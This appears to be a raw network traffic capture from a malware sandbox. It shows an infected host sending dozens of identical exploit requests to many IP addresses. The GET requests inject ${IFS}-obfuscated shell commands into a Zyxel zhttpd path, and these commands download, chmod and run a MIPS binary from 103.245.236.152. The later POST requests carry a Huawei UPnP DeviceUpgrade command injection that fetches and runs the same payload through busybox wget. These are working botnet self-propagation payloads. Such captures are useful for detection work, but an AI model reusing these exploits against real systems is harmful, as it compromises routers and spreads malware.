                                        Jan 14, 2024 16:18:56.771784067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7815192.168.2.1358738162.52.254.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771846056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7816192.168.2.135486278.67.140.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771893024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7817192.168.2.1336054205.0.47.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771946907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7818192.168.2.135995492.245.60.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772001982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7819192.168.2.1356368223.15.79.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772047043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7820192.168.2.1333984174.144.79.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772085905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7821192.168.2.1339758154.133.254.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772140026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7822192.168.2.135829667.53.20.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772192001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7823192.168.2.1341836191.223.108.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772257090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7824192.168.2.1356824105.21.235.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772305012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7825192.168.2.134423695.101.227.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772337914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7826192.168.2.135278654.108.199.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772428036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7827192.168.2.1334514140.151.85.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772459984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7828192.168.2.1346632132.33.171.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772530079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7829192.168.2.1333122146.108.204.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772571087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7830192.168.2.1347936129.162.42.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772628069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7831192.168.2.133967242.228.166.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772685051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7832192.168.2.1355582130.193.53.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772746086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7833192.168.2.1359022110.159.29.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772797108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7834192.168.2.1338008158.153.62.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.772854090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7835192.168.2.134567271.26.179.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778287888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7836192.168.2.134351279.6.226.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778342962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7837192.168.2.1333844148.120.29.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778412104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7838192.168.2.1354884220.247.92.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778445959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7839192.168.2.1354142191.102.161.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778511047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7840192.168.2.1338466187.132.89.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778604031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7841192.168.2.133803841.132.58.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778605938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7842192.168.2.1346384217.118.63.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778673887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7843192.168.2.135257078.123.158.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778764963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7844192.168.2.133519417.253.170.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778836966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7845192.168.2.1350364185.104.29.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778883934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7846192.168.2.1333770131.190.0.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.778959036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7847192.168.2.1344942161.3.203.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779195070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7848192.168.2.1345174146.153.108.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779283047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7849192.168.2.135223072.81.189.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779309988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7850192.168.2.133944673.97.3.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779371977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7851192.168.2.134465847.111.22.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779442072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7852192.168.2.1336216142.165.10.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779522896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7853192.168.2.1352950149.66.211.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779587984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7854192.168.2.1350664153.161.246.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779642105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7855192.168.2.1337880121.4.229.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779692888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7856192.168.2.1333472212.246.86.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779714108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7857192.168.2.135930273.69.97.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779783964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7858192.168.2.1347464119.104.174.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779855967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7859192.168.2.1360842150.232.82.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779903889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7860192.168.2.134099084.147.180.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.779962063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7861192.168.2.1336722122.58.137.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780040026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7862192.168.2.1348598174.153.216.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780112028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7863192.168.2.134647859.122.195.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780158997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7864192.168.2.1342028145.52.233.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780215979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7865192.168.2.136017023.145.145.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780251026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7866192.168.2.1345116153.52.48.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.780297995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7867192.168.2.1355136198.99.67.21337215
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.476061106 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                        Connection: keep-alive
                                        Accept: */*
                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                        Content-Length: 475
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                        Jan 14, 2024 16:18:58.032908916 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                        Connection: keep-alive
                                        Accept: */*
                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                        Content-Length: 475
